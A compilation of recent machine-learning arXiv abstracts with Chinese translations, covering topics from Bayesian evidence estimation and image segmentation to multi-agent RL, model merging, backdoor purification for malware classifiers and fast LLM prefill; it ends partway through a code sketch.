We propose a novel method ($floZ$), based on normalizing flows, to estimate the Bayesian evidence (and its numerical uncertainty) from a pre-existing set of samples drawn from the unnormalized posterior distribution. We validate it on distributions whose evidence is known analytically, up to 15 parameter space dimensions, and compare with two state-of-the-art techniques for estimating the evidence: nested sampling (which computes the evidence as its main target) and a $k$-nearest-neighbors technique that produces evidence estimates from posterior samples. Provided representative samples from the target posterior are available, our method is more robust to posterior distributions with sharp features, especially in higher dimensions. For a simple multivariate Gaussian, we demonstrate its accuracy for up to 200 dimensions with $10^5$ posterior samples. $floZ$ has wide applicability, e.g., to estimate evidence from variational inference, Markov Chain Monte Carlo samples, or any other method that delivers samples and their likelihood from the unnormalized posterior density. As a physical application, we use $floZ$ to compute the Bayes factor for the presence of the first overtone in the ringdown signal of the gravitational wave data of GW150914, finding good agreement with nested sampling.
Updated: 2024-12-05 15:27:14
标题: 用正规化流从后验样本中估计贝叶斯证据
摘要: 我们提出了一种基于正规化流的新方法($floZ$),用于从已有的、取自未归一化后验分布的样本集中估计贝叶斯证据(及其数值不确定性)。我们在证据具有解析解、参数空间维度最高达15维的分布上验证了该方法,并与两种最先进的证据估计技术进行了比较:嵌套采样(其主要目标就是计算证据)和一种从后验样本产生证据估计的$k$-最近邻技术。只要有目标后验的代表性样本可用,我们的方法对具有尖锐特征的后验分布更加稳健,在更高维度下尤其如此。对于简单的多元高斯分布,我们用$10^5$个后验样本展示了其在最高200维下的准确性。$floZ$具有广泛的适用性,例如可以从变分推断、马尔可夫链蒙特卡洛样本,或任何能够提供来自未归一化后验密度的样本及其似然值的方法中估计证据。作为物理应用,我们使用$floZ$计算了GW150914引力波数据铃宕(ringdown)信号中是否存在第一泛音的贝叶斯因子,结果与嵌套采样取得了良好的一致性。
更新时间: 2024-12-05 15:27:14
领域: stat.ML,astro-ph.CO,cs.LG,gr-qc
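The identity $floZ$ builds on can be written compactly (notation ours): for a normalized posterior, every $\theta$ satisfies

\[
Z = \frac{\mathcal{L}(\theta)\,\pi(\theta)}{p(\theta \mid d)},
\]

so with a normalizing flow $q(\theta) \approx p(\theta \mid d)$ fit to the posterior samples, each sample yields an estimate $\log \hat{Z}_i = \log \mathcal{L}(\theta_i) + \log \pi(\theta_i) - \log q(\theta_i)$; the spread of these per-sample estimates indicates the numerical uncertainty (the exact aggregation is part of the paper's method).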
Quantifying the Limits of Segment Anything Model: Analyzing Challenges in Segmenting Tree-Like and Low-Contrast Structures
Segment Anything Model (SAM) has shown impressive performance in interactive and zero-shot segmentation across diverse domains, suggesting that they have learned a general concept of "objects" from their large-scale training. However, we observed that SAM struggles with certain types of objects, particularly those featuring dense, tree-like structures and low textural contrast from their surroundings. These failure modes are critical for understanding its limitations in real-world use. In order to systematically examine this issue, we propose metrics to quantify two key object characteristics: tree-likeness and textural separability. Through extensive controlled synthetic experiments and testing on real datasets, we demonstrate that SAM's performance is noticeably correlated with these factors. We link these behaviors under the concept of "textural confusion", where SAM misinterprets local structure as global texture, leading to over-segmentation, or struggles to differentiate objects from similarly textured backgrounds. These findings offer the first quantitative framework to model SAM's challenges, providing valuable insights into its limitations and guiding future improvements for vision foundation models.
Updated: 2024-12-05 15:25:51
标题: 量化Segment Anything Model的局限:分析分割树状与低对比度结构时的挑战
摘要: Segment Anything Model (SAM) 在各种领域的交互式和零样本分割中表现出色,表明它们已经从大规模训练中学习到了“对象”的一般概念。然而,我们观察到SAM在处理某些类型的对象时出现困难,特别是那些具有密集、树状结构和与周围环境低纹理对比度的对象。这些失败模式对于了解其在实际应用中的局限性至关重要。为了系统地研究这个问题,我们提出了用于量化两个关键对象特征的度量标准:树状度和纹理可分性。通过广泛的受控合成实验和对真实数据集的测试,我们展示了SAM的性能与这些因素明显相关。我们将这些行为联系在“纹理混淆”概念下,SAM将局部结构误解为全局纹理,导致过分割,或者难以区分对象和纹理相似的背景。这些发现提供了第一个定量框架来模拟SAM的挑战,为了解其限制并指导未来改进视觉基础模型提供了宝贵的见解。
更新时间: 2024-12-05 15:25:51
领域: cs.CV,cs.LG,eess.IV
LMDM:Latent Molecular Diffusion Model For 3D Molecule Generation
In this work, we propose a latent molecular diffusion model that can make the generated 3D molecules rich in diversity and maintain rich geometric features. The model captures the information of the forces and local constraints between atoms so that the generated molecules can maintain equivariance to Euclidean transformations together with a high level of effectiveness and diversity. We also use the lower-rank manifold advantage of the latent variables of the latent model to fuse the information of the forces between atoms to better maintain the geometric equivariant properties of the molecules. Because there is no need to perform information fusion encoding in stages like traditional encoders and decoders, this reduces the amount of calculation in the back-propagation process. The model keeps the forces and local constraints of particle bonds in the latent variable space, reducing the impact of network underfitting on large positional drift of the particle geometry, so that our model can converge earlier. We introduce a distribution control variable in each backward step to strengthen exploration and improve the diversity of generation. In our experiments, both the quality of the generated samples and the convergence speed of the model are significantly improved.
Updated: 2024-12-05 15:25:18
标题: LMDM: 用于3D分子生成的潜在分子扩散模型
摘要: 在这项工作中,我们提出了一种潜在的分子扩散模型,可以使生成的3D分子具有丰富的多样性,并保持丰富的几何特征。该模型捕获了原子之间的力量和局部约束的信息,使生成的分子能够保持欧几里德变换和高水平的有效性和多样性。我们还利用潜在模型的潜在变量的低秩流形优势,将原子之间的力量信息融合,以更好地保持分子的几何等变性质。由于不需要像传统的编码器和解码器那样在阶段中执行信息融合编码,这减少了反向传播过程中的计算量。该模型将粒子键的力量和局部约束保留在潜在变量空间中,减少了网络表面的欠拟合对粒子几何的大位置漂移的影响,使我们的模型能够更早地收敛。我们在每个反向步骤中引入一个分布控制变量,以加强探索和提高生成的多样性。在实验中,我们生成的样本的质量和模型的收敛速度显著提高了。
更新时间: 2024-12-05 15:25:18
领域: cs.LG
In-context learning and Occam's razor
A central goal of machine learning is generalization. While the No Free Lunch Theorem states that we cannot obtain theoretical guarantees for generalization without further assumptions, in practice we observe that simple models which explain the training data generalize best: a principle called Occam's razor. Despite the need for simple models, most current approaches in machine learning only minimize the training error, and at best indirectly promote simplicity through regularization or architecture design. Here, we draw a connection between Occam's razor and in-context learning: an emergent ability of certain sequence models like Transformers to learn at inference time from past observations in a sequence. In particular, we show that the next-token prediction loss used to train in-context learners is directly equivalent to a data compression technique called prequential coding, and that minimizing this loss amounts to jointly minimizing both the training error and the complexity of the model that was implicitly learned from context. Our theory and the empirical experiments we use to support it not only provide a normative account of in-context learning, but also elucidate the shortcomings of current in-context learning methods, suggesting ways in which they can be improved. We make our code available at https://github.com/3rdCore/PrequentialCode.
Updated: 2024-12-05 15:24:33
标题: 上下文学习与奥卡姆剃刀
摘要: 机器学习的一个中心目标是泛化。虽然"没有免费午餐"定理表明,在没有进一步假设的情况下我们无法获得泛化的理论保证,但在实践中我们观察到,能解释训练数据的简单模型泛化能力最佳:这一原则被称为奥卡姆剃刀。尽管需要简单的模型,但目前大多数机器学习方法只是最小化训练误差,最多通过正则化或架构设计间接促进简单性。在这里,我们建立了奥卡姆剃刀与上下文学习之间的联系:上下文学习是某些序列模型(如Transformer)涌现出的一种能力,即在推理时从序列中的过去观察中进行学习。特别地,我们证明了用于训练上下文学习者的下一个词元预测损失直接等价于一种称为预序(prequential)编码的数据压缩技术,而最小化该损失相当于同时最小化训练误差和从上下文中隐式学到的模型的复杂性。我们的理论及支持它的实证实验不仅为上下文学习提供了规范性解释,还阐明了当前上下文学习方法的不足之处,并提出了改进方向。我们的代码可在https://github.com/3rdCore/PrequentialCode获取。
更新时间: 2024-12-05 15:24:33
领域: cs.LG,cs.AI
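The compression quantity referenced above is standard and can be stated in LaTeX (notation ours): the prequential code length of a sequence under a learner updated online is

\[
L_{\mathrm{preq}}(x_{1:T}) = \sum_{t=1}^{T} -\log p_{\theta(x_{<t})}(x_t \mid x_{<t}),
\]

which is exactly the cumulative next-token prediction loss of an in-context learner; in the MDL view, minimizing it jointly accounts for the fit of the final model and the complexity of the model implicitly learned from context.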
Reachable Polyhedral Marching (RPM): An Exact Analysis Tool for Deep-Learned Control Systems
Neural networks are increasingly used in robotics as policies, state transition models, state estimation models, or all of the above. With these components being learned from data, it is important to be able to analyze what behaviors were learned and how this affects closed-loop performance. In this paper we take steps toward this goal by developing methods for computing control invariant sets and regions of attraction (ROAs) of dynamical systems represented as neural networks. We focus our attention on feedforward neural networks with the rectified linear unit (ReLU) activation, which are known to implement continuous piecewise-affine (PWA) functions. We describe the Reachable Polyhedral Marching (RPM) algorithm for enumerating the affine pieces of a neural network through an incremental connected walk. We then use this algorithm to compute exact forward and backward reachable sets, from which we provide methods for computing control invariant sets and ROAs. Our approach is unique in that we find these sets incrementally, without Lyapunov-based tools. In our examples we demonstrate the ability of our approach to find non-convex control invariant sets and ROAs on tasks with learned van der Pol oscillator and pendulum models. Further, we provide an accelerated algorithm for computing ROAs that leverages the incremental and connected enumeration of affine regions that RPM provides. We show this acceleration to lead to a 15x speedup in our examples. Finally, we apply our methods to find a set of states that are stabilized by an image-based controller for an aircraft runway control problem.
Updated: 2024-12-05 15:23:20
标题: 可达多面体行进(RPM):用于深度学习控制系统的精确分析工具
摘要: 神经网络在机器人学中越来越多地被用作策略、状态转换模型、状态估计模型或以上所有内容。由于这些组件是从数据中学习的,因此能够分析学习到的行为以及这如何影响闭环性能非常重要。在本文中,我们通过开发计算表示为神经网络的动态系统的控制不变集和吸引域(ROAs)的方法,朝着这个目标迈出了一步。我们将注意力集中在具有修正线性单元(ReLU)激活的前馈神经网络上,这些网络被认为实现连续分段仿射(PWA)函数。我们描述了可达多面体行进(RPM)算法,通过增量连接步行枚举神经网络的仿射片段。然后,我们使用该算法计算精确的前向和后向可达集,从中提供计算控制不变集和ROAs的方法。我们的方法独特之处在于,我们逐步找到这些集合,而无需利用李亚普诺夫工具。在我们的示例中,我们展示了我们的方法在具有学习的van der Pol振荡器和摆模型的任务中找到非凸控制不变集和ROAs的能力。此外,我们提供了一种用于计算ROAs的加速算法,利用RPM提供的增量和连接枚举仿射区域。我们展示了这种加速在我们的示例中导致15倍的加速。最后,我们应用我们的方法找到了由基于图像的控制器稳定的飞机跑道控制问题的状态集。
更新时间: 2024-12-05 15:23:20
领域: cs.LG,cs.AI,cs.RO,cs.SY,eess.SY
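A minimal sketch of the piecewise-affine fact RPM builds on (this is not the RPM enumeration algorithm itself): at any input, the ReLU activation pattern fixes a polyhedral region on which the network is exactly affine, and the local affine map can be read off layer by layer.

import numpy as np

def local_affine(weights, biases, x):
    # Accumulate the affine map (W, b) the ReLU network computes on the
    # polyhedral region containing x, fixed by x's activation pattern.
    W, b = np.eye(len(x)), np.zeros(len(x))
    h = np.asarray(x, dtype=float)
    for i, (Wi, bi) in enumerate(zip(weights, biases)):
        pre = Wi @ h + bi
        W, b = Wi @ W, Wi @ b + bi
        if i < len(weights) - 1:              # ReLU on hidden layers only
            mask = (pre > 0).astype(float)    # the activation pattern
            h = mask * pre
            W, b = mask[:, None] * W, mask * b
        else:
            h = pre
    return W, b                               # f(x') == W @ x' + b near x

rng = np.random.default_rng(0)
weights = [rng.standard_normal((8, 4)), rng.standard_normal((2, 8))]
biases = [rng.standard_normal(8), rng.standard_normal(2)]
x = rng.standard_normal(4)
W, b = local_affine(weights, biases, x)
ref = weights[1] @ np.maximum(weights[0] @ x + biases[0], 0) + biases[1]
print(np.allclose(W @ x + b, ref))            # True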
A Complexity-Based Theory of Compositionality
Compositionality is believed to be fundamental to intelligence. In humans, it underlies the structure of thought, language, and higher-level reasoning. In AI, compositional representations can enable a powerful form of out-of-distribution generalization, in which a model systematically adapts to novel combinations of known concepts. However, while we have strong intuitions about what compositionality is, there currently exists no formal definition for it that is measurable and mathematical. Here, we propose such a definition, which we call representational compositionality, that accounts for and extends our intuitions about compositionality. The definition is conceptually simple, quantitative, grounded in algorithmic information theory, and applicable to any representation. Intuitively, representational compositionality states that a compositional representation satisfies three properties. First, it must be expressive. Second, it must be possible to re-describe the representation as a function of discrete symbolic sequences with re-combinable parts, analogous to sentences in natural language. Third, the function that relates these symbolic sequences to the representation, analogous to semantics in natural language, must be simple. Through experiments on both synthetic and real world data, we validate our definition of compositionality and show how it unifies disparate intuitions from across the literature in both AI and cognitive science. We also show that representational compositionality, while theoretically intractable, can be readily estimated using standard deep learning tools. Our definition has the potential to inspire the design of novel, theoretically-driven models that better capture the mechanisms of compositional thought.
Updated: 2024-12-05 15:20:28
标题: 基于复杂性的组合性理论
摘要: 组合性被认为是智能的基础。在人类身上,它构成了思维、语言和高层推理的结构。在人工智能领域,组合性表征可以实现一种强大的分布外泛化,使模型能够系统地适应已知概念的新组合。然而,尽管我们对组合性有强烈的直觉,目前尚不存在可测量、数学化的正式定义。在这里,我们提出了这样一个定义,称为表征组合性(representational compositionality),它涵盖并扩展了我们对组合性的直觉。该定义在概念上简单、可定量,立足于算法信息论,并适用于任何表征。直观地说,表征组合性要求一个组合性表征满足三个性质。首先,它必须具有表达力。其次,必须能够将该表征重新描述为由可重组部分构成的离散符号序列的函数,类似于自然语言中的句子。第三,将这些符号序列与表征相关联的函数(类似于自然语言中的语义)必须简单。通过对合成数据和真实世界数据的实验,我们验证了我们对组合性的定义,并展示了它如何统一人工智能和认知科学文献中各种不同的直觉。我们还表明,表征组合性虽然在理论上难以精确计算,但可以用标准深度学习工具轻松估计。我们的定义有潜力启发新的、理论驱动的模型设计,以更好地刻画组合性思维的机制。
更新时间: 2024-12-05 15:20:28
领域: cs.CL,cs.AI,cs.LG
Cross-domain and Cross-dimension Learning for Image-to-Graph Transformers
Direct image-to-graph transformation is a challenging task that involves solving object detection and relationship prediction in a single model. Due to this task's complexity, large training datasets are rare in many domains, making the training of deep-learning methods challenging. This data sparsity necessitates transfer learning strategies akin to the state-of-the-art in general computer vision. In this work, we introduce a set of methods enabling cross-domain and cross-dimension learning for image-to-graph transformers. We propose (1) a regularized edge sampling loss to effectively learn object relations in multiple domains with different numbers of edges, (2) a domain adaptation framework for image-to-graph transformers aligning image- and graph-level features from different domains, and (3) a projection function that allows using 2D data for training 3D transformers. We demonstrate our method's utility in cross-domain and cross-dimension experiments, where we utilize labeled data from 2D road networks for simultaneous learning in vastly different target domains. Our method consistently outperforms standard transfer learning and self-supervised pretraining on challenging benchmarks, such as retinal or whole-brain vessel graph extraction.
Updated: 2024-12-05 15:19:47
标题: 图像到图形转换器的跨域和跨维度学习
摘要: 直接的图像到图形转换是一项具有挑战性的任务,需要在单个模型中同时解决目标检测和关系预测。由于该任务的复杂性,许多领域缺乏大型训练数据集,使得深度学习方法的训练颇具挑战。这种数据稀疏性需要类似于通用计算机视觉中最先进水平的迁移学习策略。在这项工作中,我们引入了一组方法,使图像到图形转换器能够进行跨域和跨维度学习。我们提出了:(1)一种正则化的边采样损失,以在边数不同的多个域中有效学习对象关系;(2)一个适用于图像到图形转换器的域自适应框架,用于对齐来自不同域的图像级和图形级特征;(3)一种投影函数,允许使用二维数据训练三维转换器。我们在跨域和跨维度实验中展示了该方法的实用性:利用二维道路网络的标注数据,在差异巨大的目标域中同时进行学习。在视网膜或全脑血管图提取等具有挑战性的基准上,我们的方法始终优于标准迁移学习和自监督预训练。
更新时间: 2024-12-05 15:19:47
领域: cs.CV,cs.AI
A History of Philosophy in Colombia through Topic Modelling
Data-driven approaches to philosophy have emerged as a valuable tool for studying the history of the discipline. However, most studies in this area have focused on a limited number of journals from specific regions and subfields. We expand the scope of this research by applying dynamic topic modelling techniques to explore the history of philosophy in Colombia and Latin America. Our study examines the Colombian philosophy journal Ideas y Valores, founded in 1951 and currently one of the most influential academic philosophy journals in the region. By analyzing the evolution of topics across the journal's history, we identify various trends and specific dynamics in philosophical discourse within the Colombian and Latin American context. Our findings reveal that the most prominent topics are value theory (including ethics, political philosophy, and aesthetics), epistemology, and the philosophy of science. We also trace the evolution of articles focusing on the historical and interpretive aspects of philosophical texts, and we note a notable emphasis on German philosophers such as Kant, Husserl, and Hegel on various topics throughout the journal's lifetime. Additionally, we investigate whether articles with a historical focus have decreased over time due to editorial pressures. Our analysis suggests no significant decline in such articles. Finally, we propose ideas for extending this research to other Latin American journals and suggest improvements for natural language processing workflows in non-English languages.
Updated: 2024-12-05 15:14:16
标题: 哥伦比亚哲学史的主题建模研究
摘要: 数据驱动的哲学研究方法已成为研究学科历史的有价值工具。然而,该领域的大多数研究集中在特定地区和子领域的少数期刊上。我们通过应用动态主题建模技术,探索哥伦比亚和拉丁美洲的哲学史,从而扩展了这一研究的范围。我们的研究考察了哥伦比亚哲学期刊《Ideas y Valores》,该期刊创办于1951年,目前是该地区最具影响力的学术哲学期刊之一。通过分析该期刊历史上主题的演变,我们识别出哥伦比亚和拉丁美洲语境下哲学话语的各种趋势和特定动态。我们的研究结果显示,最突出的主题是价值理论(包括伦理学、政治哲学和美学)、认识论和科学哲学。我们还追溯了聚焦哲学文本历史与诠释层面的文章的演变,并注意到在期刊的整个历史中,康德、胡塞尔和黑格尔等德国哲学家在各类主题上都受到显著关注。此外,我们还考察了具有历史取向的文章是否因编辑压力而随时间减少;我们的分析表明这类文章并没有显著下降。最后,我们提出了将这项研究扩展到其他拉丁美洲期刊的想法,并就非英语语言的自然语言处理流程提出了改进建议。
更新时间: 2024-12-05 15:14:16
领域: cs.LG,cs.CL,cs.DL
DEIM: DETR with Improved Matching for Fast Convergence
We introduce DEIM, an innovative and efficient training framework designed to accelerate convergence in real-time object detection with Transformer-based architectures (DETR). To mitigate the sparse supervision inherent in one-to-one (O2O) matching in DETR models, DEIM employs a Dense O2O matching strategy. This approach increases the number of positive samples per image by incorporating additional targets, using standard data augmentation techniques. While Dense O2O matching speeds up convergence, it also introduces numerous low-quality matches that could affect performance. To address this, we propose the Matchability-Aware Loss (MAL), a novel loss function that optimizes matches across various quality levels, enhancing the effectiveness of Dense O2O. Extensive experiments on the COCO dataset validate the efficacy of DEIM. When integrated with RT-DETR and D-FINE, it consistently boosts performance while reducing training time by 50%. Notably, paired with RT-DETRv2, DEIM achieves 53.2% AP in a single day of training on an NVIDIA 4090 GPU. Additionally, DEIM-trained real-time models outperform leading real-time object detectors, with DEIM-D-FINE-L and DEIM-D-FINE-X achieving 54.7% and 56.5% AP at 124 and 78 FPS on an NVIDIA T4 GPU, respectively, without the need for additional data. We believe DEIM sets a new baseline for advancements in real-time object detection. Our code and pre-trained models are available at https://github.com/ShihuaHuang95/DEIM.
Updated: 2024-12-05 15:10:13
标题: DEIM:具有改进匹配的DETR以实现快速收敛
摘要: 我们介绍了DEIM,这是一个创新且高效的训练框架,旨在加速基于Transformer架构(DETR)的实时目标检测的收敛。为了缓解DETR模型中一对一(O2O)匹配中固有的稀疏监督,DEIM采用了一种密集的O2O匹配策略。该方法通过使用标准数据增强技术,增加每个图像的正样本数量,引入了额外的目标。虽然密集的O2O匹配加快了收敛速度,但也引入了许多可能影响性能的低质量匹配。为了解决这个问题,我们提出了一种新颖的损失函数Matchability-Aware Loss(MAL),优化了各种质量水平的匹配,增强了密集的O2O的有效性。在COCO数据集上进行的大量实验验证了DEIM的有效性。当与RT-DETR和D-FINE集成时,它始终提升性能,同时将训练时间缩短了50%。值得注意的是,与RT-DETRv2配对,DEIM在一天内在NVIDIA 4090 GPU上实现了53.2%的AP。此外,经过DEIM训练的实时模型胜过了主要的实时目标检测器,DEIM-D-FINE-L和DEIM-D-FINE-X在NVIDIA T4 GPU上分别以124和78 FPS实现了54.7%和56.5%的AP,而无需额外数据。我们相信DEIM为实时目标检测的进展设立了新的基线。我们的代码和预训练模型可以在https://github.com/ShihuaHuang95/DEIM上获取。
更新时间: 2024-12-05 15:10:13
领域: cs.CV,cs.AI
HyperMARL: Adaptive Hypernetworks for Multi-Agent RL
Balancing individual specialisation and shared behaviours is a critical challenge in multi-agent reinforcement learning (MARL). Existing methods typically focus on encouraging diversity or leveraging shared representations. Full parameter sharing (FuPS) improves sample efficiency but struggles to learn diverse behaviours when required, while no parameter sharing (NoPS) enables diversity but is computationally expensive and sample inefficient. To address these challenges, we introduce HyperMARL, a novel approach using hypernetworks to balance efficiency and specialisation. HyperMARL generates agent-specific actor and critic parameters, enabling agents to adaptively exhibit diverse or homogeneous behaviours as needed, without modifying the learning objective or requiring prior knowledge of the optimal diversity. Furthermore, HyperMARL decouples agent-specific and state-based gradients, which empirically correlates with reduced policy gradient variance, potentially offering insights into its ability to capture diverse behaviours. Across MARL benchmarks requiring homogeneous, heterogeneous, or mixed behaviours, HyperMARL consistently matches or outperforms FuPS, NoPS, and diversity-focused methods, achieving NoPS-level diversity with a shared architecture. These results highlight the potential of hypernetworks as a versatile approach to the trade-off between specialisation and shared behaviours in MARL.
Updated: 2024-12-05 15:09:51
标题: HyperMARL:用于多智能体强化学习的自适应超网络
摘要: 在多智能体强化学习(MARL)中,平衡个体专业化和共享行为是一个关键挑战。现有方法通常专注于鼓励多样性或利用共享表示。全参数共享(FuPS)提高了样本效率,但在需要时难以学习多样化的行为;无参数共享(NoPS)虽然能够实现多样性,但计算成本高且样本效率低。为了应对这些挑战,我们引入了HyperMARL,一种使用超网络来平衡效率与专业化的新方法。HyperMARL生成特定于各智能体的actor和critic参数,使智能体能够按需自适应地表现出多样化或同质化的行为,而无需修改学习目标,也不需要关于最优多样性的先验知识。此外,HyperMARL解耦了特定于智能体的梯度和基于状态的梯度,经验上这与策略梯度方差的降低相关,可能有助于解释其捕捉多样化行为的能力。在需要同质、异质或混合行为的MARL基准上,HyperMARL始终与FuPS、NoPS以及以多样性为核心的方法持平或更优,并以共享架构实现了NoPS级别的多样性。这些结果凸显了超网络作为在MARL中权衡专业化与共享行为的多功能方法的潜力。
更新时间: 2024-12-05 15:09:51
领域: cs.LG,cs.AI,cs.MA
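A hedged sketch of the hypernetwork idea (layer sizes and wiring are illustrative, not the paper's architecture): a shared hypernetwork maps an agent embedding to that agent's actor weights, so a single set of learned parameters yields per-agent policies.

import torch
import torch.nn as nn

class HyperActor(nn.Module):
    def __init__(self, n_agents, obs_dim, act_dim, emb_dim=16):
        super().__init__()
        self.emb = nn.Embedding(n_agents, emb_dim)
        self.hyper_w = nn.Linear(emb_dim, act_dim * obs_dim)   # generates W_i
        self.hyper_b = nn.Linear(emb_dim, act_dim)             # generates b_i
        self.obs_dim, self.act_dim = obs_dim, act_dim

    def forward(self, agent_id, obs):                          # obs: (obs_dim,)
        e = self.emb(agent_id)
        W = self.hyper_w(e).view(self.act_dim, self.obs_dim)
        b = self.hyper_b(e)
        return W @ obs + b                                     # agent-specific logits

actor = HyperActor(n_agents=4, obs_dim=10, act_dim=5)
print(actor(torch.tensor(0), torch.randn(10)).shape)           # torch.Size([5])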
Model-GLUE: Democratized LLM Scaling for A Large Model Zoo in the Wild
As Large Language Models (LLMs) excel across tasks and specialized domains, scaling LLMs based on existing models has garnered significant attention, which faces the challenge of decreasing performance when combining disparate models. Various techniques have been proposed for the aggregation of pre-trained LLMs, including model merging, Mixture-of-Experts, and stacking. Despite their merits, a comprehensive comparison and synergistic application of them to a diverse model zoo is yet to be adequately addressed. In light of this research gap, this paper introduces Model-GLUE, a holistic LLM scaling guideline. First, our work starts with a benchmarking of existing LLM scaling techniques, especially selective merging, and variants of mixture. Utilizing the insights from the benchmark results, we formulate an optimal strategy for the selection and aggregation of a heterogeneous model zoo characterizing different architectures and initialization.Our methodology involves the clustering of mergeable models and optimal merging strategy selection, and the integration of clusters through a model mixture. Finally, evidenced by our experiments on a diverse Llama-2-based model zoo, Model-GLUE shows an average performance enhancement of 5.61%, achieved without additional training. Codes are available at: https://github.com/Model-GLUE/Model-GLUE.
Updated: 2024-12-05 15:08:56
标题: Model-GLUE:面向真实世界大型模型库的民主化LLM扩展
摘要: 随着大型语言模型(LLMs)在各种任务和专业领域表现出色,基于现有模型扩展LLMs引起了极大关注,但在组合不同模型时面临性能下降的挑战。已有多种技术被提出用于聚合预训练的LLMs,包括模型合并、专家混合(Mixture-of-Experts)和堆叠。尽管各有优点,但对它们进行全面比较并协同应用于多样化的模型库仍未得到充分研究。鉴于这一研究空白,本文介绍了Model-GLUE,一个全面的LLM扩展指南。首先,我们的工作从对现有LLM扩展技术的基准测试开始,特别是选择性合并以及混合的各种变体。利用基准测试结果的见解,我们制定了一种最优策略,用于选择和聚合一个由不同架构和初始化构成的异构模型库。我们的方法包括对可合并模型进行聚类并选择最优合并策略,然后通过模型混合来集成各个簇。最后,在一个多样化的基于Llama-2的模型库上进行的实验表明,Model-GLUE在无需额外训练的情况下实现了平均5.61%的性能提升。代码可在以下网址获取:https://github.com/Model-GLUE/Model-GLUE。
更新时间: 2024-12-05 15:08:56
Fields: cs.LG,cs.AI,cs.CL
Foundations of the Theory of Performance-Based Ranking
Ranking entities such as algorithms, devices, methods, or models based on their performances, while accounting for application-specific preferences, is a challenge. To address this challenge, we establish the foundations of a universal theory for performance-based ranking. First, we introduce a rigorous framework built on top of both probability theory and order theory. Our new framework encompasses the elements necessary to (1) manipulate performances as mathematical objects, (2) express which performances are worse than or equivalent to others, (3) model tasks through a variable called satisfaction, (4) consider properties of the evaluation, (5) define scores, and (6) specify application-specific preferences through a variable called importance. On top of this framework, we propose the first axiomatic definition of performance orderings and performance-based rankings. Then, we introduce a universal parametric family of scores, called ranking scores, that can be used to establish rankings satisfying our axioms, while considering application-specific preferences. Finally, we show, in the case of two-class classification, that the family of ranking scores encompasses well-known performance scores, including the accuracy, the true positive rate (recall, sensitivity), the true negative rate (specificity), the positive predictive value (precision), and F1. However, we also show that some other scores commonly used to compare classifiers are unsuitable to derive performance orderings satisfying the axioms. Therefore, this paper provides the computer vision and machine learning communities with a rigorous framework for evaluating and ranking entities.
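For concreteness, the classical two-class scores that the paper shows to be members of its ranking-score family can all be read off a confusion matrix; the snippet below gives only the plain definitions, not any of the paper's general framework.

```python
def two_class_scores(tp, fp, tn, fn):
    """Standard performance scores from confusion-matrix counts."""
    scores = {
        "accuracy": (tp + tn) / (tp + fp + tn + fn),
        "tpr (recall, sensitivity)": tp / (tp + fn),
        "tnr (specificity)": tn / (tn + fp),
        "ppv (precision)": tp / (tp + fp),
    }
    p, r = scores["ppv (precision)"], scores["tpr (recall, sensitivity)"]
    scores["f1"] = 2 * p * r / (p + r)
    return scores

print(two_class_scores(tp=40, fp=10, tn=45, fn=5))
```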
Updated: 2024-12-05 15:05:25
Fields: cs.LG,cs.CV,cs.PF
PBP: Post-training Backdoor Purification for Malware Classifiers
In recent years, the rise of machine learning (ML) in cybersecurity has brought new challenges, including the increasing threat of backdoor poisoning attacks on ML malware classifiers. For instance, adversaries could inject malicious samples into public malware repositories, contaminating the training data and potentially causing the ML model to misclassify malware. Current countermeasures predominantly focus on detecting poisoned samples by leveraging disagreements within the outputs of a diverse set of ensemble models on training data points. However, these methods are not suitable for scenarios where Machine Learning-as-a-Service (MLaaS) is used or when users aim to remove backdoors from a model after it has been trained. Addressing this scenario, we introduce PBP, a post-training defense for malware classifiers that mitigates various types of backdoor embeddings without assuming any specific backdoor embedding mechanism. Our method exploits the influence of backdoor attacks on the activation distribution of neural networks, independent of the trigger-embedding method. In the presence of a backdoor attack, the activation distribution of each layer is distorted into a mixture of distributions. By regulating the statistics of the batch normalization layers, we can guide a backdoored model to perform similarly to a clean one. Our method demonstrates substantial advantages over several state-of-the-art methods, as evidenced by experiments on two datasets, two types of backdoor methods, and various attack configurations. Notably, our approach requires only a small portion of the training data -- only 1% -- to purify the backdoor and reduce the attack success rate from 100% to almost 0%, a 100-fold improvement over the baseline methods. Our code is available at https://github.com/judydnguyen/pbp-backdoor-purification-official.
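A minimal sketch of the core idea as we understand it (an assumption about the mechanism, not the authors' implementation): re-estimate the batch-normalization statistics on a small clean subset so the backdoored model's activation distribution is pulled back toward the clean component of the mixture.

```python
import torch

def recalibrate_bn(model, clean_loader, device="cpu"):
    """Re-estimate BN running stats from ~1% clean data; no weight updates."""
    for m in model.modules():
        if isinstance(m, torch.nn.modules.batchnorm._BatchNorm):
            m.reset_running_stats()
            m.momentum = None  # None -> cumulative moving average in PyTorch
    model.train()              # BN updates its stats only in train mode
    with torch.no_grad():      # but no gradients / parameter updates
        for x, _ in clean_loader:
            model(x.to(device))
    return model.eval()
```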
Updated: 2024-12-05 15:03:26
Fields: cs.LG,cs.AI,cs.CR
SwiftKV: Fast Prefill-Optimized Inference with Knowledge-Preserving Model Transformation
LLM inference for popular enterprise use cases, such as summarization, RAG, and code generation, typically involves prompt lengths that are orders of magnitude longer than generation lengths. This characteristic leads to high prefill cost and increased response latency. In this paper, we present SwiftKV, a novel model transformation and distillation procedure specifically designed to reduce the time and cost of processing prompt tokens while preserving high quality of generated tokens. SwiftKV combines three key mechanisms: i) SingleInputKV, which prefills later layers' KV cache using a much earlier layer's output, allowing prompt tokens to skip much of the model computation; ii) AcrossKV, which merges the KV caches of neighboring layers to reduce the memory footprint and support larger batch sizes for higher throughput; and iii) a knowledge-preserving distillation procedure that can adapt existing LLMs for SwiftKV with minimal accuracy impact and low compute and data requirements. For Llama-3.1-8B and 70B, SwiftKV reduces the compute requirement of prefill by 50% and the memory requirement of the KV cache by 62.5% while incurring minimal quality degradation across a wide range of tasks. In end-to-end inference serving using an optimized vLLM implementation, SwiftKV realizes up to 2x higher aggregate throughput and 60% lower time per output token. It achieves a staggering 560 TFlops/GPU of normalized inference throughput, which translates to 16K tokens/s for Llama-3.1-70B in 16-bit precision on 4x H100 GPUs. Our training, inference, and model implementations are open-sourced and can be found at https://huggingface.co/collections/Snowflake/swiftkv-models-674f7d7474eb789e185d31cb.
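A conceptual toy of the SingleInputKV idea (our reading, not Snowflake's implementation; ToyLayer and its k_proj/v_proj projections are stand-ins): during prefill, a single early hidden state supplies the K/V inputs for all later layers, so prompt tokens skip the remaining blocks' compute.

```python
import torch
import torch.nn as nn

class ToyLayer(nn.Module):
    def __init__(self, d=32):
        super().__init__()
        self.mix = nn.Linear(d, d)                   # stand-in for a block
        self.k_proj, self.v_proj = nn.Linear(d, d), nn.Linear(d, d)
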